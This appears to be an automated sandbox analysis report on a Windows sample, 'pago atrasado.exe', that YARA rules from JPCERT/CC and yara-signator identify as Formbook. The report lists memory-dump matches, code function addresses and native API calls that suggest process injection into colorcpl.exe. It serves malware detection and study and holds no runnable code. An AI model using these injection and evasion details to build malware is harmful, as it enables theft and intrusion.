Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: pago atrasado.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_004030FB
Detected potential crypto function
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004047D3 0_2_004047D3
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004061D4 0_2_004061D4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10008826 0_2_10008826
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10003D10 0_2_10003D10
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100110D1 0_2_100110D1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000F8F2 0_2_1000F8F2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001199C 0_2_1001199C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100059A1 0_2_100059A1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A9E5 0_2_1001A9E5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A9F4 0_2_1001A9F4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000B22E 0_2_1000B22E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000FE64 0_2_1000FE64
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10005E95 0_2_10005E95
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100062AD 0_2_100062AD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100066E2 0_2_100066E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10006B17 0_2_10006B17
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000F380 0_2_1000F380
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041D0F5 1_2_0041D0F5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C0FC 1_2_0041C0FC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B8B6 1_2_0041B8B6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C985 1_2_0041C985
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C3AF 1_2_0041C3AF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00408C6B 1_2_00408C6B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00408C70 1_2_00408C70
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041BD45 1_2_0041BD45
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041A6B6 1_2_0041A6B6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A920A8 1_2_00A920A8
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB090 1_2_009DB090
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A928EC 1_2_00A928EC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81002 1_2_00A81002
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CF900 1_2_009CF900
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A922AE 1_2_00A922AE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FEBB0 1_2_009FEBB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8DBD2 1_2_00A8DBD2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92B28 1_2_00A92B28
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D841F 1_2_009D841F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8D466 1_2_00A8D466
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581 1_2_009F2581
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A925DD 1_2_00A925DD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DD5E0 1_2_009DD5E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92D07 1_2_00A92D07
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C0D20 1_2_009C0D20
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91D55 1_2_00A91D55
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92EF7 1_2_00A92EF7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E6E30 1_2_009E6E30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8D616 1_2_00A8D616
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91FF1 1_2_00A91FF1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00401030 1_1_00401030
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041D0F5 1_1_0041D0F5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C0FC 1_1_0041C0FC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B8B6 1_1_0041B8B6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C985 1_1_0041C985
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454841F 16_2_0454841F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1002 16_2_045F1002
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B090 16_2_0454B090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04601D55 16_2_04601D55
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453F900 16_2_0453F900
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04530D20 16_2_04530D20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454D5E0 16_2_0454D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581 16_2_04562581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04556E30 16_2_04556E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456EBB0 16_2_0456EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B8B6 16_2_02B1B8B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1D0F5 16_2_02B1D0F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1C985 16_2_02B1C985
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1A6B6 16_2_02B1A6B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B02FB0 16_2_02B02FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B08C70 16_2_02B08C70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B08C6B 16_2_02B08C6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B02D90 16_2_02B02D90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1BD45 16_2_02B1BD45
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0453B150 appears 32 times
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: String function: 009CB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185D0 NtCreateFile, 1_2_004185D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418680 NtReadFile, 1_2_00418680
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418700 NtClose, 1_2_00418700
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004187B0 NtAllocateVirtualMemory, 1_2_004187B0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185CA NtCreateFile, 1_2_004185CA
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041867A NtReadFile, 1_2_0041867A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004186FB NtClose, 1_2_004186FB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00A098F0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00A09860
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk, 1_2_00A09840
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk, 1_2_00A099A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00A09910
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk, 1_2_00A09A20
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00A09A00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk, 1_2_00A09A50
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095D0 NtClose,LdrInitializeThunk, 1_2_00A095D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09540 NtReadFile,LdrInitializeThunk, 1_2_00A09540
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00A096E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00A09660
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00A097A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00A09780
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00A09FE0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00A09710
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098A0 NtWriteVirtualMemory, 1_2_00A098A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09820 NtEnumerateKey, 1_2_00A09820
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0B040 NtSuspendThread, 1_2_00A0B040
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099D0 NtCreateProcessEx, 1_2_00A099D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09950 NtQueueApcThread, 1_2_00A09950
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A80 NtOpenDirectoryObject, 1_2_00A09A80
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A10 NtQuerySection, 1_2_00A09A10
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A3B0 NtGetContextThread, 1_2_00A0A3B0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09B00 NtSetValueKey, 1_2_00A09B00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095F0 NtQueryInformationFile, 1_2_00A095F0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09520 NtWaitForSingleObject, 1_2_00A09520
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0AD30 NtSetContextThread, 1_2_00A0AD30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09560 NtWriteFile, 1_2_00A09560
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A096D0 NtCreateKey, 1_2_00A096D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09610 NtEnumerateValueKey, 1_2_00A09610
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09670 NtQueryInformationProcess, 1_2_00A09670
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09650 NtQueryValueKey, 1_2_00A09650
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09730 NtQueryVirtualMemory, 1_2_00A09730
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A710 NtOpenProcessToken, 1_2_00A0A710
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09760 NtOpenProcess, 1_2_00A09760
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09770 NtSetInformationFile, 1_2_00A09770
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A770 NtOpenThread, 1_2_00A0A770
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_004185D0 NtCreateFile, 1_1_004185D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00418680 NtReadFile, 1_1_00418680
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00418700 NtClose, 1_1_00418700
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_004187B0 NtAllocateVirtualMemory, 1_1_004187B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk, 16_2_04579840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_04579860
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579540 NtReadFile,LdrInitializeThunk, 16_2_04579540
